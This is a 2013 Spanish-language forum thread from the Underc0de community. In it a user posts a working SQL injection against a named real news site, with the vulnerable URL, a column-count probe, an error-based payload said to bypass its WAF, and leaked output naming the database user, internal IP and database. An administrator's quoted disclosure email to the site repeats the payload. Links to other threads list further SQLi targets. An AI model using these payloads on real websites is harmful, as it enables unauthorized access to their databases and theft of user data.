comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

SQLI gente.com.ar

  • 2 Respuestas
  • 1370 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado hdbreaker

  • *
  • Underc0der
  • Mensajes: 411
  • Actividad:
    0%
  • Reputación 0
  • HD_Breaker
    • Ver Perfil
    • Security Signal
    • Email
  • Skype: hdbreaker96
  • Twitter: @SecSignal
« en: Febrero 01, 2013, 03:41:21 am »


Web: http://gente.com.ar/flash/diosa/listar.php?ID='12928
Vector: http://gente.com.ar/flash/diosa/listar.php?ID=-725+ORDER+BY+1,2,3,4,5 (Salta el error tiene 4)
Tiene WAF

Despues de no poder rendirme ante el WAF (Cuestion de Honor) y peliando un rato con el lo bypassie.



Vector=http://gente.com.ar/flash/diosa/listar.php?ID=-1+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)--
user(): Error: Duplicate entry 'ad-gt@10.10.10.2~1' for key 1
database: Error: Duplicate entry 'gente~1' for key 1
« Última modificación: Enero 08, 2015, 02:36:38 pm por Expermicid »

Ser Libres es un Privilegio por el cual pocos estamos dispuestos a correr el riesgo

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5409
  • Actividad:
    18.33%
  • Reputación 33
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #1 en: Febrero 06, 2013, 07:12:21 pm »
Excelente HD! ahi envie el reporte

Citar
Estimado administrador de gente.com.ar,

Pertenezco a una comunidad orientada a la seguridad informatica llamada Underc0de (www.underc0de.org) somos autodidactas, y nos gusta encontrar fallas, reportarlas y brindamos soportes para que puedan solucionarlas.

Le escribo para informarle que uno de nuestros usuarios apodado HD_Breaker reporto un bug de seguridad en su sitio. Se trata de un SQLi

http://gente.com.ar/flash/diosa/listar.php?ID=%2712928

A partir de esto, se podria tener los datos de usuarios/administradores almacenados en su base de datos llamada "gente" para luego hackear el sitio.
Con el fin de que esto no ocurra, nosotros les estamos avisando de esta falla en su sitio.

Nosotros no cobramos dinero, simplemente les agradeceriamos que colocara nuestro link en el footer de su sitio (sin compromiso)

A demas de esto, tambien este usuario reporto que su sitio tiene WAF

http://gente.com.ar/flash/diosa/listar.php?ID=-1+or+1+group+by+concat_ws%280x7e,version%28%29,floor%28rand%280%29*2%29%29+having+min%280%29--

Si necesita ayuda o soporte, no dude en contactarnos!

Saludos Corditales
Underc0de Security Research


Desconectado hdbreaker

  • *
  • Underc0der
  • Mensajes: 411
  • Actividad:
    0%
  • Reputación 0
  • HD_Breaker
    • Ver Perfil
    • Security Signal
    • Email
  • Skype: hdbreaker96
  • Twitter: @SecSignal
« Respuesta #2 en: Febrero 06, 2013, 08:15:01 pm »
Genial!

Ser Libres es un Privilegio por el cual pocos estamos dispuestos a correr el riesgo

 

¿Te gustó el post? COMPARTILO!



[SQLi] leong-leong.com

Iniciado por F0M3T

Respuestas: 0
Vistas: 884
Último mensaje Abril 10, 2013, 02:39:57 am
por F0M3T
SQLI Organo Profesional de los Ingenieros de Caminos Canales y Puertos

Iniciado por hdbreaker

Respuestas: 1
Vistas: 1164
Último mensaje Julio 25, 2013, 10:14:56 pm
por F0M3T
SQLI Double Error Based http://campusvirtual.frsf.utn.edu.ar

Iniciado por hdbreaker

Respuestas: 1
Vistas: 1105
Último mensaje Febrero 19, 2013, 06:59:26 pm
por ANTRAX
SQLI Bypass Admin.asp SocArgentina Investigacion Bioquimica e Ing Molecular

Iniciado por hdbreaker

Respuestas: 1
Vistas: 1253
Último mensaje Marzo 12, 2013, 12:46:44 pm
por Cronos
Agujero en servidores de BBDD [Hacking Google + SQLi] - www.kanglin.com.tw

Iniciado por baah

Respuestas: 5
Vistas: 2241
Último mensaje Junio 02, 2017, 06:39:33 am
por baah